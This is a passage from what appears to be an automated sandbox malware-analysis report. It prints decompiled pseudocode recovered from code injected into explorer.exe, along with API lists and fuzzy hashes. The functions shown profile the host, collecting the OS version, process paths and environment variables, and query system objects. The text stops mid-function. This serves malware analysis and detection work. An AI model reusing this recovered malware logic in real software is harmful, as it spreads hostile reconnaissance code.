        					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
        					 *0x9e6ac = _t12;
        					__eflags = _t12;
        					if(_t12 != 0) {
        						_t14 = E00089EBB();
        						__eflags = _t14;
        						if(_t14 == 0) {
        							_t28 = 0;
        							__eflags = 0;
        						} else {
        							_t15 =  *0x9e688; // 0xb0000
        							lstrcmpiW(_t15 + 0x228, _t14);
        							asm("sbb esi, esi");
        							_t28 = _t28 + 1;
        						}
        					}
        					_t13 = _t28;
        				} else {
        					_t19 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t19 + 0x30))(_t11);
        					_t13 = 3;
        				}
        				return _t13;
        			}

        APIs
        • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: lstrcmpi
        • String ID:
        • API String ID: 1586166983-0
        • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
        • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
        • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
        • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008BA05() {
        				signed int _v8;
        				signed int _v12;
        				intOrPtr _t15;
        				void* _t16;
        				void* _t18;
        				void* _t21;
        				intOrPtr _t22;
        				void* _t24;
        				void* _t30;
        
        				_v8 = _v8 & 0x00000000;
        				_t15 =  *0x9e68c; // 0x133fab8
        				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
        				if(_t16 != 0) {
        					_v12 = _v12 & 0x00000000;
        					_t18 = E0008B998(1,  &_v12); // executed
        					_t30 = _t18;
        					if(_t30 != 0) {
        						CloseHandle(_v8);
        						_t21 = _t30;
        					} else {
        						if(_v8 != _t18) {
        							_t22 =  *0x9e684; // 0x133f8f0
        							 *((intOrPtr*)(_t22 + 0x30))(_v8);
        						}
        						_t21 = 0;
        					}
        					return _t21;
        				} else {
        					return _t16;
        				}
        			}

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
        • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
        • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
        • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00085CEC(void* __ecx, void* __eflags, void* __fp0) {
        				void _v44;
        				signed int _t8;
        				intOrPtr _t14;
        				intOrPtr _t15;
        				intOrPtr _t21;
        				void* _t24;
        				void* _t29;
        				void* _t35;
        
        				_t35 = __eflags;
        				_t24 = __ecx;
        				_t8 =  *0x9e688; // 0xb0000
        				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
        				E000885EF();
        				E00088F78();
        				 *0x9e780 = 0;
        				 *0x9e784 = 0;
        				 *0x9e77c = 0;
        				E00085EB6(); // executed
        				E0008CF84(_t24);
        				_t14 =  *0x9e688; // 0xb0000
        				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
        				_t15 =  *0x9e688; // 0xb0000
        				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7, _t35);
        				E0008B337( &_v44);
        				memset( &_v44, 0, 0x27);
        				E00085C26( &_v44, __fp0);
        				_t21 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t21 + 0xdc))(0, _t29);
        				return 0;
        			}

        APIs
          • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
          • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
          • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
          • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
          • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
          • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
          • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
        • memset.MSVCRT ref: 00085D5F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CurrentProcessmemset$CloseCreateFileHandleHeapModuleNameVersion
        • String ID:
        • API String ID: 4245722550-0
        • Opcode ID: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
        • Instruction ID: 619f41ac1f5a27a22a19cca9ef8015db0493fccabd3b7c3a99182c1f6e1babcb
        • Opcode Fuzzy Hash: 3c71dc86d00b2fc8688ed114ed3d19f177a23f683fdb634b92ec5639f0742622
        • Instruction Fuzzy Hash: 28011D71501254AFF600FBA8DC4ADD97BE4FF18750F850066F44497263DB745940CBA2
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008861A(int _a4, intOrPtr _a8) {
        				int _t3;
        				intOrPtr _t4;
        				void* _t9;
        
        				_t3 = _a4;
        				if(_t3 == 0) {
        					return _t3;
        				}
        				_t9 =  *_t3;
        				if(_t9 != 0) {
        					 *_t3 =  *_t3 & 0x00000000;
        					_t4 = _a8;
        					if(_t4 != 0xffffffff) {
        						if(_t4 == 0xfffffffe) {
        							_t4 = E0008C392(_t9);
        						}
        					} else {
        						_t4 = E0008C379(_t9);
        					}
        					E0008874F(_t9, 0, _t4);
        					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
        				}
        				return _t3;
        			}

        APIs
        • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
        • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
        • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
        • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
        				signed int _t5;
        				void* _t6;
        				void* _t10;
        				long _t15;
        				void* _t17;
        
        				_t15 = 2;
        				_t5 = E0008A5F7(_a4, _t15);
        				_t17 = _t5;
        				if(_t17 != 0) {
        					_t6 = E0008A65C(_t17, _a8, _a12); // executed
        					if(_t6 != 0) {
        						CloseHandle(_t17);
        						return 0;
        					}
        					_t10 = 0xfffffffe;
        					return _t10;
        				}
        				return _t5 | 0xffffffff;
        			}

        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
        • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
        • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
        • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000898A6(void* __eflags, intOrPtr _a4) {
        				intOrPtr _t24;
        
        				_t24 = _a4;
        				if(E0008A4BF( *(_t24 + 0x1c), 0x3a98) >= 0) {
        					CloseHandle( *(_t24 + 0x1c));
        					 *((intOrPtr*)(_t24 + 0x18)) =  *((intOrPtr*)(_t24 + 8))( *((intOrPtr*)(_t24 + 0xc)));
        					if(( *(_t24 + 0x14) & 0x00000001) == 0) {
        						E0008984A(_t24, 1);
        					}
        					return  *((intOrPtr*)(_t24 + 0x18));
        				}
        				return 0;
        			}

        APIs
        • CloseHandle.KERNELBASE(?), ref: 000898CA
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
        • Instruction ID: b32fbe6ba74ab13a60de709608ce14b267378680ed387debe1417f5410f660e5
        • Opcode Fuzzy Hash: 5ef8d3bc2a1d0954a875872caaf3ef1d034ba8ea9ac2313de69fc76a64cb86ef
        • Instruction Fuzzy Hash: C0F0A031300702DBC720BF62E80496BBBE9FF563507048829E5C687962DB71F8019790
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E0008B337(void* __ecx) {
        				intOrPtr _t4;
        				void* _t5;
        				intOrPtr _t6;
        				void* _t12;
        				void* _t13;
        
        				_t4 =  *0x9e684; // 0x133f8f0
        				_t13 = 0;
        				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
        				_t12 = _t5;
        				if(_t12 != 0) {
        					_t6 =  *0x9e684; // 0x133f8f0
        					_push(_t12);
        					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
        						_t13 = 1;
        					}
        					CloseHandle(_t12);
        					return _t13;
        				}
        				return _t5;
        			}

        APIs
        • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CloseHandle
        • String ID:
        • API String ID: 2962429428-0
        • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
        • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
        • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
        • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        C-Code - Quality: 86%
        			E0008D01F(void* __fp0) {
        				char _v8;
        				char _v12;
        				char _v16;
        				struct _SYSTEM_INFO _v52;
        				char _v180;
        				char _v692;
        				char _v704;
        				char _v2680;
        				void* __esi;
        				struct _OSVERSIONINFOA* _t81;
        				intOrPtr _t83;
        				void* _t84;
        				long _t86;
        				intOrPtr* _t88;
        				intOrPtr _t90;
        				intOrPtr _t95;
        				intOrPtr _t97;
        				void* _t98;
        				intOrPtr _t103;
        				char* _t105;
        				void* _t108;
        				char _t115;
        				signed int _t117;
        				char _t119;
        				intOrPtr _t124;
        				intOrPtr _t127;
        				intOrPtr _t130;
        				intOrPtr _t134;
        				intOrPtr _t147;
        				intOrPtr _t149;
        				intOrPtr _t152;
        				intOrPtr _t154;
        				signed int _t159;
        				struct HINSTANCE__* _t162;
        				short* _t164;
        				intOrPtr _t167;
        				WCHAR* _t168;
        				char* _t169;
        				intOrPtr _t181;
        				intOrPtr _t200;
        				void* _t215;
        				char _t218;
        				void* _t219;
        				char* _t220;
        				struct _OSVERSIONINFOA* _t222;
        				void* _t223;
        				int* _t224;
        				void* _t241;
        
        				_t241 = __fp0;
        				_t162 =  *0x9e69c; // 0x10000000
        				_t81 = E00088604(0x1ac4);
        				_t222 = _t81;
        				if(_t222 == 0) {
        					return _t81;
        				}
        				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
        				_t83 =  *0x9e684; // 0x133f8f0
        				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
        				_t3 = _t222 + 0x648; // 0x648
        				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
        				_t5 = _t222 + 0x1644; // 0x1644
        				_t216 = _t5;
        				_t86 = GetModuleFileNameW(0, _t5, 0x105);
        				_t227 = _t86;
        				if(_t86 != 0) {
        					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
        				}
        				GetCurrentProcess();
        				_t88 = E0008BA05();
        				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
        				_t178 =  *_t88;
        				if(E0008BB8D( *_t88) == 0) {
        					_t90 = E0008BA62(_t178, _t222);
        					__eflags = _t90;
        					_t181 = (0 | _t90 > 0x00000000) + 1;
        					__eflags = _t181;
        					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
        				} else {
        					 *((intOrPtr*)(_t222 + 0x214)) = 3;
        				}
        				_t12 = _t222 + 0x220; // 0x220
        				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
        				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
        				_push( &_v16);
        				 *(_t222 + 0x224) = _t162;
        				_push( &_v8);
        				_v12 = 0x80;
        				_push( &_v692);
        				_v8 = 0x100;
        				_push( &_v12);
        				_t22 = _t222 + 0x114; // 0x114
        				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
        				_t95 =  *0x9e68c; // 0x133fab8
        				_push(0);
        				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
        					GetLastError();
        				}
        				_t97 =  *0x9e694; // 0x133fa48
        				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
        				_t26 = _t222 + 0x228; // 0x228
        				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
        				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
        				GetLastError();
        				_t31 = _t222 + 0x228; // 0x228
        				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
        				_t34 = _t222 + 0x114; // 0x114
        				_t103 = E0008B7A8(_t34,  &_v692);
        				_t35 = _t222 + 0xb0; // 0xb0
        				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
        				_push(_t35);
        				E0008B67D(_t103, _t35, _t98, _t241);
        				_t37 = _t222 + 0xb0; // 0xb0
        				_t105 = _t37;
        				_t38 = _t222 + 0xd0; // 0xd0
        				_t164 = _t38;
        				if(_t105 != 0) {
        					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
        					if(_t159 > 0) {
        						_t164[_t159] = 0;
        					}
        				}
        				_t41 = _t222 + 0x438; // 0x438
        				_t42 = _t222 + 0x228; // 0x228
        				E00088FD8(_t42, _t41);
        				_t43 = _t222 + 0xb0; // 0xb0
        				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
        				_t44 = _t222 + 0x100c; // 0x100c
        				E0008B88A(_t108, _t44, _t241);
        				_t199 = GetCurrentProcess();
        				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
        				memset(_t222, 0, 0x9c);
        				_t224 = _t223 + 0xc;
        				_t222->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t222);
        				_t167 =  *0x9e684; // 0x133f8f0
        				_t115 = 0;
        				_v8 = 0;
        				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
        					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
        					_t115 = _v8;
        				}
        				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
        				if(_t115 == 0) {
        					GetSystemInfo( &_v52);
        					_t117 = _v52.dwOemId & 0x0000ffff;
        				} else {
        					_t117 = 9;
        				}
        				_t54 = _t222 + 0x1020; // 0x1020
        				_t168 = _t54;
        				 *(_t222 + 0x9c) = _t117;
        				GetWindowsDirectoryW(_t168, 0x104);
        				_t119 = E000895E1(_t199, 0x10c);
        				_t200 =  *0x9e684; // 0x133f8f0
        				_t218 = _t119;
        				 *_t224 = 0x104;
        				_push( &_v704);
        				_push(_t218);
        				_v8 = _t218;
        				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
        					_t154 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
        				}
        				E000885D5( &_v8);
        				_t124 =  *0x9e684; // 0x133f8f0
        				_t61 = _t222 + 0x1434; // 0x1434
        				_t219 = _t61;
        				 *_t224 = 0x209;
        				_push(_t219);
        				_push(L"USERPROFILE");
        				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
        					E00089640(_t219, 0x105, L"%s\\%s", _t168);
        					_t152 =  *0x9e684; // 0x133f8f0
        					_t224 =  &(_t224[5]);
        					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
        				}
        				_push(0x20a);
        				_t64 = _t222 + 0x122a; // 0x122a
        				_t169 = L"TEMP";
        				_t127 =  *0x9e684; // 0x133f8f0
        				_push(_t169);
        				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
        					_t149 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
        				}
        				_push(0x40);
        				_t220 = L"SystemDrive";
        				_push( &_v180);
        				_t130 =  *0x9e684; // 0x133f8f0
        				_push(_t220);
        				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
        					_t147 =  *0x9e684; // 0x133f8f0
        					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
        				}
        				_v8 = 0x7f;
        				_t72 = _t222 + 0x199c; // 0x199c
        				_t134 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
        				_t75 = _t222 + 0x100c; // 0x100c
        				E00092301(E0008D400(_t75, E0008C379(_t75), 0),  &_v2680);
        				_t76 = _t222 + 0x1858; // 0x1858
        				E000922D3( &_v2680, _t76, 0x20);
        				_t79 = _t222 + 0x1878; // 0x1878
        				E0008902D(1, _t79, 0x14, 0x1e,  &_v2680);
        				 *((intOrPtr*)(_t222 + 0x1898)) = E0008CD33(_t79);
        				return _t222;
        			}

        APIs
          • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
        • GetCurrentProcessId.KERNEL32 ref: 0008D046
        • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 0008D082
        • GetCurrentProcess.KERNEL32 ref: 0008D09F
        • GetLastError.KERNEL32 ref: 0008D13E
        • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 0008D16C
        • GetLastError.KERNEL32 ref: 0008D172
        • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 0008D1C7
        • GetCurrentProcess.KERNEL32 ref: 0008D20E
        • memset.MSVCRT ref: 0008D229
        • GetVersionExA.KERNEL32(00000000), ref: 0008D234
        • GetCurrentProcess.KERNEL32(00000100), ref: 0008D24E
        • GetSystemInfo.KERNEL32(?), ref: 0008D26A
        • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0008D287
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
        • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
        • API String ID: 3876402152-2706916422
        • Opcode ID: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
        • Instruction ID: 25e8395d91437c6831676a43eef48ae52fba165dceb8ee9639bfc079f816c02c
        • Opcode Fuzzy Hash: 12dfeda50fcfa05c5d9c49e5a909d2d4da4cbeaac424930ed5d12b2800c1f241
        • Instruction Fuzzy Hash: 77B16071600704AFE750EB70DD89FEA77E8BF58300F00456AF59AD7292EB74AA04CB21
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 50%
        			E0008DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
        				signed int _v12;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				void* _v28;
        				signed int _v32;
        				char _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				char _v48;
        				char _v52;
        				intOrPtr _v56;
        				signed int _v60;
        				char* _v72;
        				signed short _v80;
        				signed int _v84;
        				char _v88;
        				char _v92;
        				char _v96;
        				intOrPtr _v100;
        				char _v104;
        				char _v616;
        				intOrPtr* _t159;
        				char _t165;
        				signed int _t166;
        				signed int _t173;
        				signed int _t178;
        				signed int _t186;
        				intOrPtr* _t187;
        				signed int _t188;
        				signed int _t192;
        				intOrPtr* _t193;
        				intOrPtr _t200;
        				intOrPtr* _t205;
        				signed int _t207;
        				signed int _t209;
        				intOrPtr* _t210;
        				intOrPtr _t212;
        				intOrPtr* _t213;
        				signed int _t214;
        				char _t217;
        				signed int _t218;
        				signed int _t219;
        				signed int _t230;
        				signed int _t235;
        				signed int _t242;
        				signed int _t243;
        				signed int _t244;
        				signed int _t245;
        				intOrPtr* _t247;
        				intOrPtr* _t251;
        				signed int _t252;
        				intOrPtr* _t253;
        				void* _t255;
        				intOrPtr* _t261;
        				signed int _t262;
        				signed int _t283;
        				signed int _t289;
        				char* _t298;
        				void* _t320;
        				signed int _t322;
        				intOrPtr* _t323;
        				intOrPtr _t324;
        				signed int _t327;
        				intOrPtr* _t328;
        				intOrPtr* _t329;
        
        				_v32 = _v32 & 0x00000000;
        				_v60 = _v60 & 0x00000000;
        				_v56 = __edx;
        				_v100 = __ecx;
        				_t159 = E0008D523(__ecx);
        				_t251 = _t159;
        				_v104 = _t251;
        				if(_t251 == 0) {
        					return _t159;
        				}
        				_t320 = E00088604(0x10);
        				_v36 = _t320;
        				_pop(_t255);
        				if(_t320 == 0) {
        					L53:
        					E0008861A( &_v60, 0xfffffffe);
        					E0008D5D7( &_v104);
        					return _t320;
        				}
        				_t165 = E000895E1(_t255, 0x536);
        				 *_t328 = 0x609;
        				_v52 = _t165;
        				_t166 = E000895E1(_t255);
        				_push(0);
        				_push(_v56);
        				_v20 = _t166;
        				_push(_t166);
        				_push(_a4);
        				_t322 = E000892E5(_t165);
        				_v60 = _t322;
        				E000885D5( &_v52);
        				E000885D5( &_v20);
        				_t329 = _t328 + 0x20;
        				if(_t322 != 0) {
        					_t323 = __imp__#2;
        					_v40 =  *_t323(_t322);
        					_t173 = E000895E1(_t255, 0x9e4);
        					_v20 = _t173;
        					_v52 =  *_t323(_t173);
        					E000885D5( &_v20);
        					_t324 = _v40;
        					_t261 =  *_t251;
        					_t252 = 0;
        					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
        					__eflags = _t178;
        					if(_t178 != 0) {
        						L52:
        						__imp__#6(_t324);
        						__imp__#6(_v52);
        						goto L53;
        					}
        					_t262 = _v32;
        					_v28 = 0;
        					_v20 = 0;
        					__eflags = _t262;
        					if(_t262 == 0) {
        						L49:
        						 *((intOrPtr*)( *_t262 + 8))(_t262);
        						__eflags = _t252;
        						if(_t252 == 0) {
        							E0008861A( &_v36, 0);
        							_t320 = _v36;
        						} else {
        							 *(_t320 + 8) = _t252;
        							 *_t320 = E000891E3(_v100);
        							 *((intOrPtr*)(_t320 + 4)) = E000891E3(_v56);
        						}
        						goto L52;
        					} else {
        						goto L6;
        					}
        					while(1) {
        						L6:
        						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
        						__eflags = _t186;
        						if(_t186 != 0) {
        							break;
        						}
        						_v16 = 0;
        						_v48 = 0;
        						_v12 = 0;
        						_v24 = 0;
        						__eflags = _v84;
        						if(_v84 == 0) {
        							break;
        						}
        						_t187 = _v28;
        						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
        						__eflags = _t188;
        						if(_t188 >= 0) {
        							__imp__#20(_v24, 1,  &_v16);
        							__imp__#19(_v24, 1,  &_v48);
        							_t46 = _t320 + 0xc; // 0xc
        							_t253 = _t46;
        							_t327 = _t252 << 3;
        							_t47 = _t327 + 8; // 0x8
        							_t192 = E00088698(_t327, _t47);
        							__eflags = _t192;
        							if(_t192 == 0) {
        								__imp__#16(_v24);
        								_t193 = _v28;
        								 *((intOrPtr*)( *_t193 + 8))(_t193);
        								L46:
        								_t252 = _v20;
        								break;
        							}
        							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
        							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00088604( *(_t327 +  *_t253) << 3);
        							_t200 =  *_t253;
        							__eflags =  *(_t327 + _t200 + 4);
        							if( *(_t327 + _t200 + 4) == 0) {
        								_t136 = _t320 + 0xc; // 0xc
        								E0008861A(_t136, 0);
        								E0008861A( &_v36, 0);
        								__imp__#16(_v24);
        								_t205 = _v28;
        								 *((intOrPtr*)( *_t205 + 8))(_t205);
        								_t320 = _v36;
        								goto L46;
        							}
        							_t207 = _v16;
        							while(1) {
        								_v12 = _t207;
        								__eflags = _t207 - _v48;
        								if(_t207 > _v48) {
        									break;
        								}
        								_v44 = _v44 & 0x00000000;
        								_t209 =  &_v12;
        								__imp__#25(_v24, _t209,  &_v44);
        								__eflags = _t209;
        								if(_t209 < 0) {
        									break;
        								}
        								_t212 = E000891E3(_v44);
        								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
        								_t213 = _v28;
        								_t281 =  *_t213;
        								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
        								__eflags = _t214;
        								if(_t214 < 0) {
        									L39:
        									__imp__#6(_v44);
        									_t207 = _v12 + 1;
        									__eflags = _t207;
        									continue;
        								}
        								_v92 = E000895E1(_t281, 0x250);
        								 *_t329 = 0x4cc;
        								_t217 = E000895E1(_t281);
        								_t283 = _v80;
        								_v96 = _t217;
        								_t218 = _t283 & 0x0000ffff;
        								__eflags = _t218 - 0xb;
        								if(__eflags > 0) {
        									_t219 = _t218 - 0x10;
        									__eflags = _t219;
        									if(_t219 == 0) {
        										L35:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											L38:
        											E000885D5( &_v92);
        											E000885D5( &_v96);
        											__imp__#9( &_v80);
        											goto L39;
        										}
        										_push(_v72);
        										_push(L"%d");
        										L37:
        										_push(0xc);
        										_push(_t289);
        										E00089640();
        										_t329 = _t329 + 0x10;
        										goto L38;
        									}
        									_t230 = _t219 - 1;
        									__eflags = _t230;
        									if(_t230 == 0) {
        										L33:
        										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00088604(0x18);
        										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
        										__eflags = _t289;
        										if(_t289 == 0) {
        											goto L38;
        										}
        										_push(_v72);
        										_push(L"%u");
        										goto L37;
        									}
        									_t235 = _t230 - 1;
        									__eflags = _t235;
        									if(_t235 == 0) {
        										goto L33;
        									}
        									__eflags = _t235 == 1;
        									if(_t235 == 1) {
        										goto L33;
        									}
        									L28:
        									__eflags = _t283 & 0x00002000;
        									if((_t283 & 0x00002000) == 0) {
        										_v88 = E000895E1(_t283, 0x219);
        										E00089640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
        										E000885D5( &_v88);
        										_t329 = _t329 + 0x18;
        										_t298 =  &_v616;
        										L31:
        										_t242 = E000891E3(_t298);
        										L32:
